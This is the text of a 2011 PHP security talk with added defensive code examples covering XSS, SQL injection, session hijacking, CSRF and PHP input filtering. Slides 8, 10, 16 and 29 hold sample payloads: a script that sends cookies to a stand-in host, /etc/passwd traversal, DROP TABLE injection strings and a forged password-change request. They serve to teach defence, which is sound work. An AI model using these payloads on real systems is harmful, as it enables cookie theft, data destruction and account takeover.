SydPHP Security in PHP
Allan Shone
Security in PHP talk for SydPHP, Thursday 24th February, 2011
1.
Security and PHP
February 2011
2.
Allan Shone
Technical Yahoo!, Local Paranoid @Yahoo!7
Been at Yahoo!7 just under 3 years
allan.shone@yahoo.com
3.
Website Security
4.
What is Security?
Why is Security important?
What can you do about it?
5.
Types of issues
XSS
SQL Injection
Session Hijacking
CSRF
Phishing
6.
Why XSS?
7.
Lead to larger problems
Used to inject code into your site
Bad people™ can steal user information
8.
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E
9.
10.
http://sydphp.leetbix.com/template.php?load=/etc/passwd%00
http://sydphp.leetbix.com/template.php?load=../some-config.conf%00
11.
POST too
12.
What do I do?!
13.
Filter
Simplest solution: htmlentities()
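The following PHP is an added example, not code from Allan's slides. It takes the template.php pattern that slides 8 and 10 attack and shows the two fixes the talk points at: output encoding with htmlentities() for the reflected parameter (slide 13), and an allow-list for the template name so that user input is never turned into a filesystem path (which is what the %00 trick on slide 10 depends on). The function names, the template list and the directory layout are assumptions; it runs on current PHP (7.1 or later) from the command line.

```php
<?php
// Added example (not from the slides): the template.php pattern from slides 8 and 10
// with both defects fixed. Function names and the template list are assumptions.
declare(strict_types=1);

// Allow-list of templates that template.php may load. Anything not on the list is
// rejected, so neither "/etc/passwd" nor "../some-config.conf" can reach the
// filesystem; once no path is ever built from user input, a trailing null byte
// has nothing to truncate.
const ALLOWED_TEMPLATES = ['home', 'about', 'contact'];

function resolveTemplate(?string $requested): ?string
{
    if ($requested === null || !in_array($requested, ALLOWED_TEMPLATES, true)) {
        return null;
    }
    return __DIR__ . '/templates/' . $requested . '.php';
}

// Vulnerable rendering, as on slide 8: the raw parameter goes straight into the page.
function renderUnsafe(string $load): string
{
    return "<p>Loading {$load}</p>";
}

// Hardened rendering, as slide 13 recommends: encode before output. ENT_QUOTES encodes
// both quote styles so the value is also safe inside attribute values; the charset
// must match the page's declared charset, or the encoding can be bypassed.
function renderSafe(string $load): string
{
    return '<p>Loading ' . htmlentities($load, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Constructed input: the first payload from slide 8, as PHP sees it after URL decoding.
$payload = '<script>alert(0);</script>';
echo renderUnsafe($payload), "\n"; // a browser would execute the script
echo renderSafe($payload), "\n";   // &lt;script&gt;alert(0);&lt;/script&gt; is shown as text

var_dump(resolveTemplate('home'));           // string: .../templates/home.php
var_dump(resolveTemplate("/etc/passwd\0"));  // NULL: not on the allow-list
```

The encoding belongs at the point of output, not at the point of input: the same value may later be written into a JSON response or a SQL query, and each of those needs its own encoding.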
14.
SQL what?
15.
Arbitrary SQL code being executed
Bypass login, edit database content
Find passwords, hidden information
16.
http://sydphp.leetbix.com/login.php
Password: ' OR 1=1 -- '
' OR 1=1; DROP TABLE users; -- '
' OR 1=1; UPDATE TABLE users SET password='' WHERE 1=1; -- '
17.
Oh no!
18.
http://xkcd.com/327/
19.
escape
20.
mysql_real_escape_string()
addslashes()
PDO
PDO::quote()
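An added PHP example, not from the slides, modelled on the login.php check of slide 16: the same lookup written first with string concatenation, which the ' OR 1=1 -- payload bypasses, and then with a PDO prepared statement, which is the "PDO" item on slide 20 done properly (PDO::quote() and mysql_real_escape_string() only escape; a prepared statement keeps the value out of the SQL parser altogether). It uses an in-memory SQLite database so it runs stand-alone; the table, the user and the password are constructed, and the pdo_sqlite extension is assumed.

```php
<?php
// Added example (not from the slides): the login lookup of slide 16, vulnerable and
// hardened. The table and its single user are constructed for this demonstration.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$insert = $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$insert->execute(['alice', password_hash('correct horse battery staple', PASSWORD_DEFAULT)]);

// Vulnerable: the username is concatenated into the SQL. With "' OR 1=1 -- " the
// WHERE clause becomes  username = '' OR 1=1 -- '  and matches every row.
function findUserUnsafe(PDO $pdo, string $username): ?array
{
    $sql = "SELECT id, username, password_hash FROM users WHERE username = '" . $username . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened: a prepared statement sends the SQL text and the value separately, so the
// value can never be read as SQL, whatever characters it contains.
function findUserSafe(PDO $pdo, string $username): ?array
{
    $stmt = $pdo->prepare('SELECT id, username, password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// The password is verified in PHP against the stored hash and never appears in the
// query, so the password field cannot influence the SQL at all.
function login(PDO $pdo, string $username, string $password, callable $finder): bool
{
    $user = $finder($pdo, $username);
    return $user !== null && password_verify($password, $user['password_hash']);
}

$payload = "' OR 1=1 -- "; // constructed, from slide 16
var_dump(findUserUnsafe($pdo, $payload) !== null); // true: the bypass matched alice's row
var_dump(findUserSafe($pdo, $payload) !== null);   // false: no user is literally named that
var_dump(login($pdo, 'alice', 'correct horse battery staple', 'findUserSafe')); // true
var_dump(login($pdo, 'alice', 'wrong', 'findUserSafe'));                        // false
```

Note that the hardened version also stops the DROP TABLE and UPDATE payloads from slide 16, since nothing the user submits is ever executed as a statement; escaping alone would still leave numeric and LIKE-clause fields to worry about.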
21.
Session hijacking
22.
Bad for users
Bad for data integrity
Easy to prevent
23.
Not stand-alone
24.
Cookies
25.
Integrity checking
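Slides 23 to 25 say session hijacking is not stand-alone (the cookie is usually stolen through something like the third XSS payload on slide 8), that cookies are the weak point, and that integrity checking is the answer. The PHP below is an added example of one way to do that checking; it is not from the talk. The session functions are PHP's own, but the fingerprint scheme, the idle limit and the function names are assumptions, and the array form of session_set_cookie_params() needs PHP 7.3 or later. The request data at the bottom is constructed so it runs on the command line.

```php
<?php
// Added example (not from the slides): session integrity checks. The fingerprint
// scheme and function names are assumptions, not something the talk prescribes.
declare(strict_types=1);

// Cookie settings, applied before session_start(): the session cookie is only sent
// over HTTPS, is invisible to script (so the document.cookie grab on slide 8 gets
// nothing) and is not attached to cross-site requests.
function configureSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    ini_set('session.use_strict_mode', '1'); // reject session ids the server never issued
}

// Fingerprint of request attributes that should stay fixed for the life of a session.
// The client IP is deliberately left out: mobile users change addresses legitimately.
function sessionFingerprint(array $server): string
{
    return hash('sha256', ($server['HTTP_USER_AGENT'] ?? '') . '|' . ($server['HTTP_ACCEPT_LANGUAGE'] ?? ''));
}

// Called after a successful login: a fresh id defeats session fixation, and the
// fingerprint is recorded for later checks.
function establishSession(array &$session, array $server, int $userId): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true); // only possible inside a real request
    }
    $session = [
        'user_id'     => $userId,
        'fingerprint' => sessionFingerprint($server),
        'last_seen'   => time(),
    ];
}

// Called on every request: a fingerprint mismatch or an expired idle timer means
// the session is discarded rather than trusted.
function sessionIsValid(array $session, array $server, int $idleLimit = 1800): bool
{
    if (!isset($session['user_id'], $session['fingerprint'], $session['last_seen'])) {
        return false;
    }
    if (!hash_equals($session['fingerprint'], sessionFingerprint($server))) {
        return false;
    }
    return (time() - $session['last_seen']) <= $idleLimit;
}

// Constructed request data so the checks can be exercised without a web server.
$originalBrowser = ['HTTP_USER_AGENT' => 'Mozilla/5.0 (X11; Linux)', 'HTTP_ACCEPT_LANGUAGE' => 'en-AU'];
$otherClient     = ['HTTP_USER_AGENT' => 'curl/7.88',               'HTTP_ACCEPT_LANGUAGE' => 'en-AU'];

configureSessionCookie();
$session = [];
establishSession($session, $originalBrowser, 42);
var_dump(sessionIsValid($session, $originalBrowser)); // true
var_dump(sessionIsValid($session, $otherClient));     // false: same cookie, different client
$session['last_seen'] -= 3600;
var_dump(sessionIsValid($session, $originalBrowser)); // false: idle for longer than the limit
```

In a real application $session is $_SESSION and $server is $_SERVER; the fingerprint check is a speed bump rather than a guarantee (the attacker can copy the User-Agent header too), which is why the cookie flags and the short idle limit matter as much as the check itself.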
26.
CSRF? Sugar?
27.
Cross-site request forgery
28.
Simple, but uncommon
29.
<img src="http://othersite.com/changepasswd?new=onlyIKnow" />
<script>
a=document.createElement('img');a.src='http://badsite../';document.firstChild.appendChild(a);
a.src='http://badsite.com/otherpage';
</script>
30.
Integrity, integrity
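The "integrity" slide 30 asks for is, in practice, a per-session token that the forged request on slide 29 cannot know. The PHP below is an added example of that token, not code from the talk: the token is created once per session, written into every state-changing form, and checked with hash_equals() before the action runs. The function names, the _token field name and the constructed requests are assumptions; random_bytes() needs PHP 7 or later.

```php
<?php
// Added example (not from the slides): a synchroniser token against the forged
// password change of slide 29. Function names and the field name are assumptions.
declare(strict_types=1);

// One token per session, created lazily and kept for the session's lifetime.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Emitted inside every form that changes state.
function csrfField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="_token" value="' . $token . '">';
}

// Checked before any state-changing action. A GET is rejected outright, so an
// <img src="..."> never reaches the action; hash_equals() keeps the comparison
// constant-time.
function csrfCheck(array $session, string $method, array $post): bool
{
    if ($method !== 'POST' || !isset($session['csrf_token'], $post['_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], (string) $post['_token']);
}

function changePassword(array $session, string $method, array $post): string
{
    if (!csrfCheck($session, $method, $post)) {
        return 'rejected';
    }
    // ... update the password for $session['user_id'] here ...
    return 'changed';
}

// Constructed requests. The first mimics slide 29's <img> tag: a GET with no token.
$session = ['user_id' => 42];
echo changePassword($session, 'GET', ['new' => 'onlyIKnow']), "\n";               // rejected
echo changePassword($session, 'POST', ['new' => 'x', '_token' => 'guess']), "\n"; // rejected

// A legitimate round trip: render the form field, then post the same token back.
echo csrfField($session), "\n";
echo changePassword($session, 'POST', ['new' => 'x', '_token' => $session['csrf_token']]), "\n"; // changed
```

The token only helps if the session cookie is not readable by script; if the XSS from slide 8 is present, the attacker can read the form and the token with it, which is why the talk treats these issues as a set rather than one at a time.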
31.
Phishing!
32.
Same, but different?
33.
But what can you do?
34.
PHP's filter functions
35.
filter_has_var
filter_id
filter_input_array
filter_input
filter_list
filter_var_array
filter_var
36.
No more SuperGlobals
37.
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
echo "<h3>No results found for '{$search}'.</h3>";
echo "<a href='?search=$search&page=2'>Next page</a>";
38.
INPUT_GET
INPUT_POST
INPUT_COOKIE
INPUT_SERVER
INPUT_ENV
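Slide 37 filters one field; the multi-field form is filter_input_array() with a definition array, which is what makes "no more SuperGlobals" (slide 36) practical. The PHP below is an added example of such a definition, not from the talk. It mixes a sanitize filter with three validate filters to show the part that trips people up: validate filters return false for bad input and null for missing input, and both must be handled before the value is used. Field names, ranges and the constructed query are assumptions; it runs on PHP 7.1 or later.

```php
<?php
// Added example (not from the slides): a definition array for filter_input_array(),
// exercised here through filter_var_array() so that it runs without a web request.
declare(strict_types=1);

// Everything search.php accepts and the filter each field must pass. Fields that
// are not listed never reach the application.
const SEARCH_FILTERS = [
    'search' => ['filter' => FILTER_SANITIZE_SPECIAL_CHARS],
    'page'   => ['filter'  => FILTER_VALIDATE_INT,
                 'options' => ['min_range' => 1, 'max_range' => 1000]],
    'sort'   => ['filter'  => FILTER_VALIDATE_REGEXP,
                 'options' => ['regexp' => '/^(name|date)$/']],
    'notify' => ['filter' => FILTER_VALIDATE_EMAIL],
];

// Takes the output of filter_var_array()/filter_input_array() and resolves the two
// non-value results: false (failed the filter) and null (field absent).
function checkSearchParams(array $params): array
{
    $errors = [];

    if (!is_int($params['page'] ?? null)) {
        $params['page'] = 1;          // missing or out of range: fall back to page 1
    }
    if (!is_string($params['sort'] ?? null)) {
        $params['sort'] = 'date';     // anything but the two allowed values is dropped
    }
    if (($params['notify'] ?? null) === false) {
        $errors[] = 'notify must be a valid e-mail address';
    }
    return [$params, $errors];
}

// In a web request the same definition is applied to the live input with
//     $params = filter_input_array(INPUT_GET, SEARCH_FILTERS);
// which returns null (not an array) when nothing at all was submitted.
// For a stand-alone run, a constructed query with one problem per field.
$raw = [
    'search' => '<script>alert(0);</script>',
    'page'   => '0',
    'sort'   => 'price',
    'notify' => 'not-an-address',
];
[$params, $errors] = checkSearchParams(filter_var_array($raw, SEARCH_FILTERS));
print_r($params); // search encoded as &#60;script&#62;..., page 1, sort 'date', notify false
print_r($errors); // one error, for notify
```

One caveat on FILTER_SANITIZE_SPECIAL_CHARS at the input boundary: it rewrites the value, so the encoded form is what gets passed to the database or search index, and "O'Brien" will never match. Slide 37 gets away with it because the value is only echoed; where the value is also stored or queried, validate on input and encode on output instead.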
39.
Twitter: Allan Shone - @cerealboy, Jared Mooring - @jadzor
Filter function filters: http://au2.php.net/manual/en/filter.filters.php